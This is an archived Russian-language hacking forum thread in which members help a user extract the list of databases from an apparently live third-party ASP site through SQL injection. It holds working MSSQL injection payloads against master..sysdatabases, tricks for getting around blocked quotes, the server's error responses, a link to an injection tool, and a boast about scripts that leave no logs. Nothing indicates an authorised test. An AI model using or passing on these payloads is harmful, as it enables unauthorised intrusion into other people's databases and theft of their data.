PDA

Просмотр полной версии : MSSQL Injection вопрос


sh-smoker
16.08.2007, 15:49
Каким методом можно получить список существующих баз данных?

+toxa+
16.08.2007, 15:55
show databases;

sh-smoker
16.08.2007, 16:03
Это не то. Мне через багу в скрипте надо узнать все существующие базы.

запрос типа .asp?ID=1'INJECTION

guest3297
16.08.2007, 16:36
http://hack-shop.org.ru/board/showthread.php?t=24

select top 1 name from master..sysdatabases

sh-smoker
16.08.2007, 16:55
спасибо, помог :)
Только что-то select top 2 start at 1 не пашет

на единицу ругается Incorrect syntax near '1'

ShAnKaR
16.08.2007, 17:27
чтоб все поперебирать можно так select top 1 name from master..sysdatabases where name not in ('master','tempdb','bla bla','и так далее')

sh-smoker
16.08.2007, 17:31
чтоб все поперебирать можно так select top 1 name from master..sysdatabases where name not in ('master','tempdb','bla bla','и так далее')

я знаю, но кавычки ставить нельзя.

guest3297
16.08.2007, 17:58
select top 2 start at 1 не пашет
Запрос гласит вывести 2 строчки начиная с 1

guest3297
16.08.2007, 17:59
я знаю, но кавычки ставить нельзя.
можно использывать order by checksum

sh-smoker
16.08.2007, 19:09
-1+or+1=(select+top+1+start+at+2+name+from+master.. sysdatabases)--

ответ:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near '1'.

/newsstory.asp, line 15


что означает, это выражение я понял, не могу понять в чем ошибка синтаксиса

guest3297
16.08.2007, 19:12
-1+or+1=(select+top+1+name+start+at+2+from+master.. sysdatabases)--
а так пробывали?

sh-smoker
16.08.2007, 19:41
Теперь на at ругается :)

Incorrect syntax near 'at'.

guest3297
16.08.2007, 19:44
Скажу по секрету такая конструкция в принцыпе не должна работать хоть я и не тестил...

http://hack-shop.org.ru/mssql.php

Get db

sh-smoker
16.08.2007, 19:47
Ладно, спасибо ты мне кое в чем всетаки помог и не впервые ;)
Насчет скрипта http://hack-shop.org.ru/mssql.php, спасиб не нужно, у меня свои есть.
На моих скриптах логи не ведутся))))))

guest3297
16.08.2007, 19:54
sh-smoker (member.php?u=31719)
может тебе есть смысл в аську стучать )

sh-smoker
16.08.2007, 19:57
']sh-smoker (member.php?u=31719)
может тебе есть смысл в аську стучать )

Так теперь и буду делать ;)

xena-mil1
16.08.2007, 21:42
dddddd